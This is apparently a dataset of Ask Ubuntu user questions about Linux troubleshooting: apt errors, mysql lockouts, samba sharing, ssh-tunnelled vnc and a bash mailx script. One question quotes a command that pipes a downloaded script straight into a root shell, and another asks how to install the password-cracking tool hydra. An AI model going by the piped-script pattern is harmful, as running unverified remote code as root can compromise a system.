507150	14.04 - boot up - > password box presented - > wait a full minute before i can actually enter password !	this only started happening when i upgraded to 14.04 . upon cold start , i am presented the password screen , but i can not enter a password - both mouse pointer and password box are frozen . the system makes me wait for almost a full minute . at that time i hear what sounds like a faint disk access start-up whine , after which the mouse pointer is unfrozen and i can then enter my password . any thoughts ?
507155	cairo dock glitch how to fix this ?	i playing around with cairo dock and moving icons around and it suddenly shrank . i already reinstall cairo but it 's not changing ; i also changed the size on the cairo configuration and it did n't work .
507161	how to fix wallpaper problem ?	every time i shutdown/restart my laptop , my wallpaper always resets to blank blue and i have to re-apply my custom wallpaper . i have ubuntu 12.04 with current updates . i did n't have this problem for a long time and it just started doing it randomly a few months ago . does anyone know a fix for this ?
507162	remove invalid index	whenever i 'd run sudo apt-get update it always never ends well ... w : failed to fetch https : //deb.nodesource.com/node/dists/qiana/main/source/sources httperror404 w : failed to fetch https : //deb.nodesource.com/node/dists/qiana/main/binary-amd64/packages httperror404 w : failed to fetch https : //deb.nodesource.com/node/dists/qiana/main/binary-i386/packages httperror404 e : some index files failed to download . they have been ignored , or old ones used instead . is there some way to fix this and remove the missing index ? i 'm pretty sure i 'm not even using it . this started happening the moment i ran curl -sl https : //deb.nodesource.com/setup | sudo bash - .
507164	openafs-client fails to upgrade on newest kernel 3.13.0-32 ( ubuntu 12.04 )	this morning my ubuntu told me to do some updates , then in the end i had a msg that i should also do some hw support updates . and so i did . during the upgrade i saw there was some problems with the openafs-client . after restarting the puter openafs-client did n't work . after rebooting on the previous version openafs-client works , but what should i do to get it working on the latest kernel 3.13.0-32 ? some facts : uname -a : linux rd0022805 3.13.0-32-generic # 57~precise1-ubuntu smp tue jul 15 03:50:54 utc 2014 i686 i686 i386 gnu/linux message when i do service openafs-client start : *afs module /lib/modules/3.13.0-32-generic/fs/openafs.ko does not exist . not starting afs . please consider building kernel modules using instructions in /usr/share/doc/openafs-client/readme.modules* maybe i only have to get the missing lib module to get it working ? if so , how do i do that ?
507165	locked out of the mysql database	i 'm using ubuntu 14.04 as my host for my apache-mysql-php server setup . at first , i tried installing xampp ( from apachefriends.org ) and deployed my moodle and wordpress sites . however , after a reboot - i got locked out of the database . i get the following errors : # 1045 can not log in to the mysql server connection for controluser as defined in your configuration failed . ... whenever i try to access the phpmyadmin page . i try to login on mysql via terminal and it also returned access denied . i migrated to a new host , but this time i used the native apache-mysql-php setup ( installed via apt-get ) . i then deployed my moodle and wordpress sites , but after a reboot - the same thing happens . i was not hacked , i even modified the default access privileges and create the pma user for the phpmyadmin database . i even tried `` sudo dpkg-reconfigure phpmyadmin '' but it 's unsuccessful . i got the following error on the last step : `` error 1045 ( 28000 ) : access denied for user 'root ' @ 'localhost ' ( using password : yes ) '' . here 's the error log on my terminal : user @ ubuntuvm : ~ $ sudo dpkg-reconfigure phpmyadmin [ sudo ] password for user : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lc_ctype = `` utf-8 '' , lang = `` tl_ph.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory /usr/bin/locale : can not set lc_ctype to default locale : no such file or directory /usr/bin/locale : can not set lc_all to default locale : no such file or directory dbconfig-common : writing config to /etc/dbconfig-common/phpmyadmin.conf perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lc_ctype = `` utf-8 '' , lang = `` tl_ph.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lc_ctype = `` utf-8 '' , lang = `` tl_ph.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . replacing config file /etc/phpmyadmin/config-db.php with new version error 1045 ( 28000 ) : access denied for user 'root ' @ 'localhost ' ( using password : yes ) . unable to connect to mysql server . error encountered creating user : error 1045 ( 28000 ) : access denied for user 'root ' @ 'localhost ' ( using password : yes ) dbconfig-common : phpmyadmin configure : trying again . dbconfig-common : writing config to /etc/dbconfig-common/phpmyadmin.conf perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lc_ctype = `` utf-8 '' , lang = `` tl_ph.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lc_ctype = `` utf-8 '' , lang = `` tl_ph.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . replacing config file /etc/phpmyadmin/config-db.php with new version dbconfig-common : flushing administrative password user @ ubuntuvm : ~ $ it 's not accepting my mysql root password and i ca n't reset the mysql root password as well . however , when i execute mysql via terminal , i can enter the environment but it wo n't let me create a database . i get the error : mysql > create database test1 ; error 1044 ( 42000 ) : access denied for user '' @ 'localhost ' to database 'test1' btw , i 'm accessing the site remotely so i 'm not sure what i 'm missing here . i have tried looking at several sites and tried some but i 'm still locked out of my database . thanks in advance !
507167	sub-process /usr/bin/dpkg returned an error code ( 100 )	i m unable to install or remove any packages , it shows error like that for that i research like mkdir /tmp/dpkg cd /tmp/dpkg wget http : //archive.ubuntu.com/ubuntu/pool/main/d/dpkg/dpkg_1.15.5.6ubuntu4_i386.deb ar x dpkg*.deb data.tar.gz tar xfvz data.tar.gz ./usr/bin/dpkg sudo cp ./usr/bin/dpkg /usr/bin/ sudo apt-get update but , after wget command i m unable to untar . it shows tar ( child ) : data.tar.gz : can not open : no such file or directory tar ( child ) : error is not recoverable : exiting now tar : child returned status 2 tar : error is not recoverable : exiting now i got that package .deb i got an error like follow while perform any installation in package or remove could not exec dpkg ! e : sub-process /usr/bin/dpkg returned an error code ( 100 ) help me out this , greatly appreciated.. using 12.04 ubuntu
507170	itunes on playonlinux does n't appear in search	i ca n't find the itunes on playonlinux search , it just does n't appear . is there other way i could install it ?
507171	can i trust repositories	how can i trust any repositories like sudo add-apt-repository ppa : upubuntu-com/tor or sudo add-apt-repository ppa : wagungs/kali-linux
507173	can not remove file from trash that was put there as root	i know about the dangers of using root access so please forego the lectures . i try to be careful and will be doubly so from now on . i was using the file browser with root access in order to change some file permissions . during the process i deleted some files ( i should say that i out them in the trash ) . little did i know that the files would go to the trash as root and now i ca n't remove them because i do n't have the permission to read them but i do n't know how to access them to change the permissions because i do n't know how to get into the trash as root . all i get is a message saying that : '' this location could not be displayed . sorry , could not display all the contents of `` trash : /// '' : operation not supported i have searched around to try to find posts about it but i 've only found outdated information about a hidden file in the root directory . that does n't seem to apply any more so i 'm stuck with a file in my trash that i ca n't remove and ca n't gain access to . i 'm using ubuntu 14.04 64bit on an asus x401a laptop .
507175	403 error on virtual host on lamp stack	i 've installed lamp stack and trying to set it up using the instructions on https : //help.ubuntu.com/community/apachemysqlphp i want to be able to work in a directory other than `` var/www/ '' so i thought i could set up a virtual host for this as suggested in the link but i ca n't seem to get it to work . i 'm using apache 2.4.7 . the thing is , i ca n't find the step 4. the link i gave under virtual hosts . so i 've edited /etc/apache2/apache2.conf and added a directory tag as ; < directory /home/kemallin/dropbox/www/ > options indexes followsymlinks allowoverride none require all granted < /directory > i 've disabled the default site and enabled my newly created site conf with ; sudo a2dissite 000-default.conf & & sudo a2ensite editor.conf but when try htpp : //localhost/ it gives me this error : forbidden you do n't have permission to access / on this server . apache/2.4.7 ( ubuntu ) server at localhost port 80 i also tried to change < directory / > options followsymlinks allowoverride none require all denied < /directory > to require all granted restarted the apache service and still its giving me the same 403 forbidden error . any pointers on this one ? thanks .
507178	how do i cat / rm a file called `` -v '' ?	i have a file named -v : $ ls -hl ( ... ) drwxrwxr-x 2 segticfnd segticfnd 4096 set 28 2012 ubuntu one/ -rw-r -- r -- 1 root root 180 fev 12 11:53 -v drwxr-xr-x 5 segticfnd segticfnd 4096 mar 12 18:15 vă­deos/ ( ... ) if i try to use a cli command it assumes -v to be an argument . i have tried enclosing it on quotes , preceding it by \ and using tab to autofill , but had no success . the system can read it , because i can open it using gedit .
507183	how to install hydra 8.0 on ubuntu ?	https : //www.thc.org/thc-hydra/ how can i install it on my ubuntu 14.04 ? please be detailed as i 'm still a newbie with linux ; ) regards
507187	how do i do to disable restart option in the top right corner ?	i 'm new here and i have a little problem with the shutdown options , but it 's not severe . since some updates ago ubuntu 14.04 shows me three options , suspend , restart and shutdown , when by default it has to show two options , suspend and shutdown , with shutdown option carrying to shutdown and restart . well , in my case i see three options instead of two , but shutdown and restart do the same thing , letting me to shutdown and reboot since any option ( they work as the default shutdown option has to do ) . it 's not a big error , but i want to correct it . http : //i58.tinypic.com/2r59atj.png
507188	unable to turn on bluetooth on my lenovo ideapad u310 using ubuntu 14.04	i 'm a new linux user and i do n't really understand the replies to similar queries . the toggle in the bluetooth settings wo n't turn on at all .
507190	volume louder than 100 % xfce	i know in unity , for example , in system settings you can toggle `` allow volume louder than 100 % '' on or off , however , i recently switched to xubuntu and i ca n't find the option in settings or even under pulseaudio settings , is there a way to toggle this in xfce ?
507191	ca n't find where memory is being used	i 'm still a novice with ubuntu , and have converted an old toshiba l655d to use the os . i have 3gb of memory installed , and this appears on on the grub memtest . but within ubuntu , looking at free -m when running basic applications i find ... mem : total : 738 used : 673 free : 59 -/+ buffers/cache : used : 509 free : 229 swap : total : 2808 used : 355 free : 2453 the swap total is the only number cold to the 3000+ mb of memory i have ( and i 'm not sure what that means ) . i 'm not sure how to put this memory to use . if at all possible . i saw no option in the bios to reallocate memory . ubuntu 12.04 lts ă64 toshiba l655d amd athlon ii p320 dual-core ă2
507192	12.10 : unable to upgrade/install softwares	i have changed new release with old release in order to update also unchecked ppa . please help me out.im getting a getting a error message : w : failed to fetch http : //in.old-releases.ubuntu.com/ubuntu/dists/quantal-backports/multiverse/binary-i386/packages unable to connect to in.old-releases.ubuntu.com : http : and so on ... ...
507193	backing up everything including packages and all for later use	so i have been using linux ubuntu for a while.. and i am loving it ... i have downloaded and installed a lot of packages and softwares ... now that i am thinking of trying another linux distro ... is there a way to back up everything so that in another distro i can just install the packages without having to download again ... thanks > > >
507194	installation of ubuntu on lenovo b480 laptop	i have lenovo b480 laptop , a year old , having windows 7 64 bit installed . now , i want to install ubuntu desktop on it . so , would like to know whether my laptop hardware is having 100 % compatibility with ubuntu or not . my lenovo laptop specification is as given below . intel core i5-3210 3rd gen processor 4 gb ddr3 ram ( single slot ) 500 gb toshiba sata hard drive finger print reader for authentication webcam intel 4000 hd graphics card intel wifi nic realtek ethernet gbps nic also , would like to know which ubuntu version is compatible with my laptop . hope , it should be 11.10 & later . which application will be used to detect & make `` finger print device '' fully functional ?
507196	exactly what updates will i get with the ubuntu 14.04 lts ?	exactly what updates will i get with ubuntu 14.04 lts ? am i going to get updates on the unity3d interface ? the window manager ? the core system ? software like firefox , vlc etc ?
507201	modprobe bluez module not found	on trying sudo apt-get install bluez on ubuntu 12.04 , i receive the following messages - reading package lists ... done building dependency tree reading state information ... done bluez is already the newest version . when i try modprobe bluez i am receiving `` fatal : module bluez not found . '' message . how do i enable bluez , as my program is not able to find the bluetooth device ? any help appreciated , thanks in advance , padma
507202	no sound , dummy output , realtek ac880 , ubuntu 14.04	can someone help with this , iâ´ve tried a lot of web info but i am a little lost here . thanks http : //www.alsa-project.org/db/ ? f=2ae67679fedfaeeeafdb744ff591b5d09c1be35f
507203	vnc across the internet through ssh tunnel to another machine on lan ?	my family often gets me to help them with computery things that they ca n't do themselves , but this has become difficult as i 've moved to another city to study at university . i managed to set up a vnc server on each of their computers , but i only allowed connections from localhost , so they would n't be `` at risk '' . i have an ssh server set up on computer # 1 . additionally , i have set up a ddns using the router itself ( thanks openwrt ) so i do n't have to get their ever-transient dynamic ip every time . the ssh port i 'm using is forwarded ( via the router ) to computer # 1 only , so i can tunnel to it and log into its vnc server through loopback with the following command : ssh -l < localport > : localhost:5900 user @ nottelling.ddnsprovider.xxx afaik , i can not log into the vnc servers on the other computers on the lan without setting up ssh servers on and tunnelling to them . the problem is , i do n't want to set up ssh servers on every computer . would there be a way for me to vnc to their computers through the ssh tunnel i establish with computer # 1 ? i figured , since computer # 1 is on the lan , i could `` be on the lan '' remotely through this ssh tunnel somehow . p.s i would use vpn , but my university does n't seem to take kindly to it . also , i know this can be done with reverse ssh tunnelling , but i 'd like to not do that if possible . if it 's not , i could probably teach my siblings how to do reverse ssh tunnelling ... ... . hopefully .
507205	concatenate single common pdf to directory of pdf files	i use pdftk , and the pdf chain gui . despite reading the man page and investing time in a variety of web searches , i ca n't find the answer to this one - i have a directory of pdf files , and i want to cat a common `` cover sheet '' pdf file on to each of them . so something like source1=../coversheet.pdf source2=*.pdf cat out*.pdf . ( i know ... ) possible ?
507206	what is dummy filesystem ?	i tried df -- help command to generate the man-page for help on df command and i am stucked with a unknown term dummy filesystem this line in df manpage is where i get to know the term first time -a , -- all **include dummy file systems**
507211	`` install ubuntu alongside windows 7 '' option does n't work	as i select the `` install ubuntu alongside windows 7 '' option in the installation menu , i am asked to `` remove the installation media and close the tray and then press enter '' ! i did what i was asked to do , then the computer restarted and windows showed up as if nothing has happened ! ! ! what should i do ?
507212	ubuntu 14.04 snap to 1/4 of the screen instead of 1/2	i have a 4k monitor on my system , i would like to change how ubuntu snaps windows , i would like it to only snap to like the upper right , upper left ext ... . instead of just the left or just the right i know in older versions of ubnutu you could change these settings in compiz but i do not see compiz on my system . thanks
507213	how to roll back hardware updates ?	i just did the hardware updates available through the update manager , this is the first time i had ever seen or heard of a hardware update but i figured it would be legit because it was coming from the official ubuntu update manager . it mentioned something about being one of the last updates before support was dropped so i thought it would be a good idea but now i think either my resolution or driver has messed up because the quality of graphics and everything things else is poor now . it 's not terrible , but i feel like it was better looking before the updates . anyone know a solution ?
507214	why does tmux/byobu fill my screen with garbage characters when i copy a selection ?	when i copy a selection from tmux with a window split , my screen fills up with garbage characters . depending on the size of the selection , it could be a lot , or just one line . the following images demonstrate : then after hitting to make the selection : notice all the garbage characters on the right pane . how do i get rid of this behavior ?
507219	why ca n't i mount a usb device in ubuntu 14.04 ?	when i try to mount a usb storage device , i receive an error stating that i am not authorized to perform the operation . i 've added myself to the fuse and plugdev user groups to no avail .
507220	problem with start cisco packet tracer 6 on ubuntu 14.04 64bit	i have problem with cisco packet tracer.i have v. 6.0.1 and ubuntu 14.04 64bit . i would like to know how fix it . when i use command /usr/local/packettracer6/packettracer to run pt i see only starting packet tracer 6.0.1 . when i click on the packet tracer in dash - nothing happens . help me . i need this program for study . i thought , probel is with 32bit program on 64 bit ubuntu , so i find this site http : //ssb.stsci.edu/ureka/dev/docs/32bit_iraf.html . i install lib32z1 lib32ncurses5 lib32bz2-1.0 but again nothing . and i sorry for my english but i wasnt born in english-speaking country .
507221	how to disable auto shutdown due to overheating on ubuntu 14.04 ?	my laptop tends to shut down automatically like every 25 minutes.. this is so frustrating . please help.. i am using ubuntu 14.04 server
507222	how are security updates classified into low/med/high ?	when an update becomes available for a particular piece of software , if i run aptitude changelog < name > i will see urgency as either low , medium or high . how is it decided which category a fix falls into ? and also , should i treat 'high ' to mean 'install asap ' and 'medium ' to mean , 'install when convenient ' ? is there a best practice to follow on how soon high medium or low fixes should be implemented ?
507223	upstart and gnome-session-unity.log goes mad	in my upstart folder in ~/.cache/upstart : -rw-r -- -- - 1 bussiere bussiere 18g ao没t 5 17:59 gnome-session-unity.log the log goes mad i 've tried purge logrotate and reinstall it but nope .
507226	ubuntu hangs & shows a black screen on install with asus z97-deluxe & gtx 770	i 'm building a new rig , and i 'm having trouble installing ubuntu . i burned the latest ubuntu 14.04 image to a dvd from my macbook pro . i booted off the dvd and pushed a key when the keyboard/person image came up to show the boot menu , and then selected install ubuntu from the menu . from there the screen just goes black and never shows anything else . for reference , here 's my hardware : asus z97-deluxe intel core i7 4.0 ghz 32gb gskill ddr3 2400 asus gtx 770 i 'm actually running 2x gtx 770 in sli , but i took one out to troubleshoot . things that i 've tried so far : waiting removing one of the video cards plugging the monitor into different outputs disabling secure boot thanks in advance for any help that you 're able to offer , i would love to get this thing up and running asap !
507227	can percona-cluster be used with lxc	can percona-cluster charm be safely placed in anto lxc containers ? if so , what would be the juju commands to achieve this ?
507229	tracking down network stalling problem	so i have this problem , my network stalls for like 2 seconds randomly sometimes . i did ping google.com for quite some time and usually every response comes in about 10ms but just once a while , it takes 1000ms , and thats where the stall occurs . my question is , what tools could i use that would show some sort of network history for me , showing what application created that high ping ?
507230	finer volume control in 14.04	in 14.04 , the volume slider ( controlled by hw switch ) seems to move in very large jumps : for instance , from to in a single keystroke . sorry about the tricky screenshot , but that looks like almost a `` 10 % '' increase in volume . how can i control volume more finely , i.e . increase in smaller increments ?
507231	when will the update from 12.04 to 14.04.01 be available through update manager ?	does anyone know when the update from 12.04 to 14.04.01 be available through update manager ? or is it already available ?
507232	( qml ) flickable not working as supposed	so , while building an ubuntu app i needed to use flickable for scrolling , so now i have code of the form page { ... flickable { anchors.fill : parent content.height : element1.height + element2.height ... ... } } and when i run it on my phone ( ubuntu utopic ) , the default position of the flickable is a few hundred pixels lower than the header . when i flick it up , it stays correctly in the position it 's supposed to stay from the start . also , when using pagestack to push another page , then come back to this one it stays in the right position . why is this and how can i fix it , so that it can be in the right position from the start . note : i 've tried many combinations with anchors , width , height , everything . one time i did get it to stay in the position , but when flicking up it overlapped the header .
507233	attempting to install an os ( linux ) from a flash drive	i 've never done this before , so please be patient . i 'm not a dummy . how do i get the flash drive to install it 's ( linux os ) info into a ( goodwill ) computer w/o an os ?
507243	suggestion for a light weight distro of linux	i'am a new ubuntu user . i install ubuntu 14.04 lts unity distro . at first it was fast enough to work with . but as soon as i install more apps it becomes impossible to work with as it becomes so slow in case of multi-tasking . so can any one suggest a stable version of debian package that i can install ? oh another thing , i have installed a lot of software . how can i backup them and transfer then to new os ? hardware specification : intel core i3 2.66ghz , 4gb ram , 6 gb swap memory , dell inspiron 15 intel core i3-390m 2.66ghz 15.6in laptop
507244	how to install visual studio 2013	i am working on web development since a long time and i love to see visual studio in ubuntu . i will use it as html editor and html5 web development . it has also a great php development extension . have anyone find a way to install it on ubuntu - i hope
507247	rebind prntscr key	i want to rebind prntscr ( `` print '' ) to a custom screenshot program : shoot . however , if i try to do it the usual way , i simply end up invoking the gnome screenshot utility . how can i make prntscr do shoot ?
507250	ubuntu 14.04 hangs on shutdown / reboot d630	i did a clean install of ubuntu 14.04 on a dell 630 laptop . shutdown & reboot hangs on the ubuntu splash screen how can i fix it ? thanks in advance , joeri
507251	ubuntu 14.04 lts could n't reach internet / router problem ?	i have a big problem ! my setup is a ubuntu 14.04 os with everything up to date ! also the kernel is updated to 3.16. this nas is directly connected to my router ( tp-link wdr4900v1 ) that has openwrt barrier breaker 14.07rc2 installed on my nas is a dyndns client script running that checks every 5 minutes my ip and setup a dyndns . now while i just open up my commandline from windows and test a ping to this dyndns , everything works fine ! try it yourself ping thisisatest.dtdns.com # yes dtdns not dyndns you should get positiv results now while i just want to reach my nas over putty ( portforwards are all setup @ openwrt ) with this dtdns adress it was n't possible ! if i use my local ip everything works fine . trying to make a apt-get update runs into failures fehl http : //ppa.launchpad.net trusty release.gpg verbindung mit ppa.launchpad.net : http nicht mรถglich : i do n't know what is wrong . the port for ssh is open but something seems to block everything from my and to my nas . please help me out : ) maybe it is a router prob ? i did factory reset and it wo n't help : / = > sry for my bad english , hope everybody understand what is my problem edit : my provider gave me a modem with integrated router support 1st setup was dmz host to my tp-link router where my nas was connected 2nd setup , i tryed to connect my nas to the provider router directly ! that does n't work too ! so now i guess , the problem must be with my nas and not with my openwrt router 's firewall .
507253	dual booting on chromebook	i recently managed to dual-boot my acer c720 chromebook with ubuntu unity . however , unlike the standard desktops that i 've seen via tutorials , etc. , unity comes preloaded with firefox , libre tools , and most importantly the software center . mine came with none of those things . while i succeeded in installing firefox , when i attempted to install the software center , i was told that the software could not be located . any ideas on how to fix this ? here are the commands i ran in my attempt to get my desktop up to snuff : sudo apt-get update sudo apt-get upgrade sudo apt-get install software-center* sudo apt-get install firefox
507256	how do i restart vsftpd ?	i am using lubuntu . i have installed vsftpd using sudo apt-get install vsftpd that ran all ok . however when i try to retstart the service with the following it can not find it : sudo /etc/init.d/vsftpd restart how do i restart the service ? i believe this command would work on ubuntu but not lubuntu . i am following this installation guide . http : //www.cyberciti.biz/faq/ubuntu-vsftpd-ftp-service-server/
507257	error compiling kernel-aodv for arm	i 'm about to implement aodv on arm board sabrelite and i 'm facing some problems . so , i use the latest version of aodv located here ( http : //sourceforge.net/projects/aodvuu/ ) . i 've follow the instruction given in readme file but at the end , i get the error : kaodv-mod.c:22:27 : fatal error : linux/version.h : no such file or directory # include < linux/version.h > since the board use 3.0.35 kernel version , i download it and i just change the kernel directory in makefile . and , it should normally worked based on the instruction ( http : //w3.antd.nist.gov/wctg/aodv_kernel/kaodv_arm.html ) . the above error suggests that i do n't have the version.h but i checked and i have all of linux header files installed , so it ca n't be that . on the step number 6 of the tutorial ( readme file ) , i did not compile the kernel 3.0.35 because i 'm pretty positive that it has the proper netfilter support for aodv-uu as it is a kernel young version . ( it is actually a configuration suggestion on kernel 2.4 and 2.6 but i think i should not obliged to do that here . ) what can be the solution of this ? do i really need to compile this kernel version ( 3.0.35 ) before keep going ? do i have to change the aodv code , and if so , which files do i have to modify ? thanks in advance !
507258	will nexus 10 run `` full desktop convergence '' ?	i am looking at getting a nexus 10 for school and i need to have the full desktop convergence . the nexus 10 only has a dual-core a15 cpu but it has a quad core gpu . i am assuming that that means it will not run the full desktop convergence is that correct ? is there another tablet in the same price range that will do desktop convergence ?
507260	samba ( using system-config-samba ) server to ubuntu transactions/editing does n't work	i have samba installed on 14.04 as a server . i have another 14.04 machine with samba installed , intending to use that as a client only . i am using system-config-samba where i can , but many hints/help with the problem i am having point me to directly editing the various samba control files . here 's my problem : i from the client i can view the files and folders in my shared folder . in some cases i can even edit them and create new ones . however , not always ... not clear where the issue is . but the real problem is that anything new is given the owner as smbguest and the group as nogroup ? ? ? i want the new folders and files to be associated with the user on the server making the changes . ( the user should be logging onto the samba share as the user on the server . i have one share on the server to which all users can access and edit . that is the `` golden '' set of files and documents used by the organization . all users have rw access through a group to those the share and folders and files . how do i do i make this happen ? can you point me to a reference that is n't out of date with respect to the 14.04 environment ? i 'd prefer a way i can do what i want to do from the system-config-samba environment , so i can teach that . but i 'll accept some manual editing . i 'm rather new to ubuntu , though on a single machine i know my way around . it is the network that is giving me fits . ps : some of the references i 've been trying to use , such as samba/sambaclientguide , do not make it clear what i have to do on the server side and what i have to do on the client side . i 'm at a loss as to what to enter on what machine . thanks . i 'm sure that whoever can answer this will be doing a lot of people a service .
507262	how can i fix this workspace glitch ?	when i have workspaces enabled ( just 2 x 2 ) it shows this : it even clones screenshots . when disabled , there is still this : and i have to move the window whenever i open a new one from the left screen to the right . i ca n't actually view the sceen on the left , other than this . is there a way to work around this , or a setting i can change ?
507263	msmtp - errors sending bash but not command line	this is in reference to a post on another forum but did n't get a single response so hoping that others here might know here . i am trying to send a message with attachment using bash and msmtp . when i run the bash script i get this error : send options without primary recipient specified . usage : mailx -eiiudefntbdnhrv~ -t file -u user -h hops -r address -s subject -a file -q file -f file -a account -b users -c users -s option users however when i copy and paste the arguments variable ( from an echo print out ) to a mailx command , everything works perfectly . this leads me to believe that there is something about the bash script that is not quite right when i am trying to send the arguments . any help would be greatly appreciated ! have been working a couple hours a night for the past week trying to get this thing working ... . misc info : i am not bash literate , just been looking at tutorials and failing i do not run a mail server , do n't understand how email works at all i do not have postfix or mutt , tried both and got worse errors and the tutorials do n't make any sense to me . waaaaayyyy over my head . bash script : # ! /bin/bash # get flag values while getopts p : v : option do case `` $ { option } '' in p ) picturepath= $ { optarg } ; ; v ) videopath= $ { optarg } ; ; esac done # destination e-mail addresses cellto= '' myemail @ gmail.com '' emailto= '' myotheremail @ yahoo.com '' args='-s `` motion detected '' ' # check files exist before checking times picfile='/home/bulsatar/.motion/lastpic.txt' vidfile='/home/bulsatar/.motion/lastvid.txt' if [ [ ! -e `` $ { picfile } '' ] ] then touch `` $ { picfile } '' fi if [ [ ! -e `` $ { vidfile } '' ] ] then touch `` $ { vidfile } '' fi now= $ ( date + '' % y % m % d % h % m % s '' ) # check for pic first if [ [ ! -z `` $ { picturepath } '' ] ] then # check if time frame is greater than ( -gt ) than 20 seconds picline= $ ( head -n 1 `` $ { picfile } '' ) if [ [ ! -z `` $ { picline } '' ] ] then if [ [ $ ( ( $ { now } - $ { picline } ) ) -gt 20 ] ] then echo $ { now } > $ { picfile } args+= ' -a `` ' '' $ { picturepath } '' ' '' ' '' $ { cellto } '' echo `` $ { args } '' echo 'take a look ' | mailx `` $ { args } '' < < < < < < < < this is where i am having trouble fi else echo $ { now } > $ { picfile } fi fi # check for vid next if [ [ ! -z `` $ { videopath } '' ] ] then # check if time frame is greater than ( -gt ) than 1 minute vidline= $ ( head -n 1 `` $ { vidfile } '' ) if [ [ ! -z `` $ { vidline } '' ] ] then if [ [ $ ( ( $ { now } - $ { vidline } ) ) -gt 60 ] ] then echo $ { now } > $ { vidfile } args+= ' -a `` ' '' $ { videopath } '' ' '' ' '' $ { emailto } '' ' < `` /home/bulsatar/bin/motion\ setup\ files/msg.txt '' echo `` $ { args } '' mailx `` $ { args } '' < < < < < < < < this is where i am having trouble fi else echo $ { now } > $ { vidfile } fi fi
507264	resolution is low and can not be adjusted	i used ubuntu 12.04 and had no problems on the resolution . when i try the 14.04 from usbdrive , it also works fine , but as soon as i install 14.04 from usb , it will only accept low resolution . my computer is a fujitsu siemens esprimo mobile v5535 . how can i get the right resolution .
507267	unable to install any application in ubuntu 14.04	i 'm facing below error while installing any application . e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . i tried to use sudo dpkg -- configure -a , then it resumed the dropbox downloading , which i cancelled yesterday and rebooted laptop after that . i think ubuntu is still stuck there . is there any way to clear dropbox downloading or to get rid of the above error . thanks
507271	ca n't make my usb drive bootable	i 'm trying to burn an iso file into my usb drive . i 've done this a number of times using 'dd' # dd if=file.iso of=/dev/sdb bs=4m i never had a problem with this ; however this time when i apply the line it tells everything is fine but when i try to boot from the usb i got this message no bootable device insert boot disk and press any key usb drive i format my usb and delete the partitions and create others but it 's no use
507274	how to create two partitions with exactly the same size ?	i created two partitions using the following commands . parted /dev/sda -- script -- mkpart primary 1 50001 parted /dev/sda -- script -- mkpart primary 1948001 1998001 each partition should have 50001 mb . however , when i use `` partclone '' trying to copy from the first partition to the second , it complains that these two partitions are not the same size . the second one is 50000 mb . when i do `` fdisk -l '' , below is the output . disk /dev/sda : 1999.3 gb , 1999307276288 bytes 255 heads , 63 sectors/track , 243068 cylinders , total 3904897024 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000d3669 device boot start end blocks id system /dev/sda1 2048 97658879 48828416 83 linux ... /dev/sda4 3804690432 3902345215 48827392 83 linux it shows the difference of the number of blocks . so if i want to create two partitions with exactly the same size , what should i do ? thanks a lot .
507277	vmware player installing on ubuntu 14.04 missing headers	i 'm trying to install vmware player on ubuntu 14.04 and i 'm running into problems : headers are missing . similar question is here , checked answers here , but nothing works . i tried to apply patch as well as described here , but it did n't work as well . i 'm about to install the latest version 6.03 . does anyone know how this could be solved ?
507278	wifi disconects acer v3 772 and ubuntu 14.04	i have a new acer v3 772 laptop i installed ubuntu 14.04 as my primary os everything works fine now except the wifi which randomly disconnects specially while using youtube .
507282	how to turn off the front diodes of asus g56jr in ubuntu 14.04	when i use my laptop at night the front panel indication diodes for wireless caps lock hdd etc . are frustratingly bright . it would be great it they were off . i know i can put some kind of sticker over them but if there 's a way to do it with any kind of setting would be great . can someone help me ?
507284	after installation errors in matlab	i have installed matlab-r2012a in ubunut-14.04 . installation is successful . but after opened matlab , two errors messages are appearing on window . how to fix these errors . this is desktop configyration file
507286	ffmpeg on concat show error `` the encoder 'aac ' is experimental but experimental codecs are not enabled , add '-strict -2 ' if you want to use it . ''	i have installed ffmpeg on my test server ubuntu14.04 64bit . the ffmpeg version i have 1.2.6-7:1.2.6-1~trusty1 . when i try to concat the videos and output it as mp4 , i got this error `` the encoder 'aac ' is experimental but experimental codecs are not enabled , add '-strict -2 ' if you want to use it . '' the same command run properly on my local , but shows issue on my test server . on my local i have 32-bit ubuntu 14.04 and ffmpeg version 2.3.git-1ace957 . does the version is the issue or i am missing something . command i run on my test server : cat 1.mpeg 2.mpeg 3.mpeg | avconv -f mpeg -i - /uploads/media_temp/user1/v.mp4
507287	what is launchpad ?	when i do sudo apt-get update i get these errors , err http : //ppa.launchpad.net trusty/main amd64 packages 404 not found err http : //ppa.launchpad.net trusty/main i386 packages 404 not found w : failed to fetch http : //ppa.launchpad.net/adilson/experimental/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/adilson/experimental/ubuntu/dists/trusty/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . i have no idea what launchpad is . what this error is ? what this error points to ? how can i remove this error ? thanks .
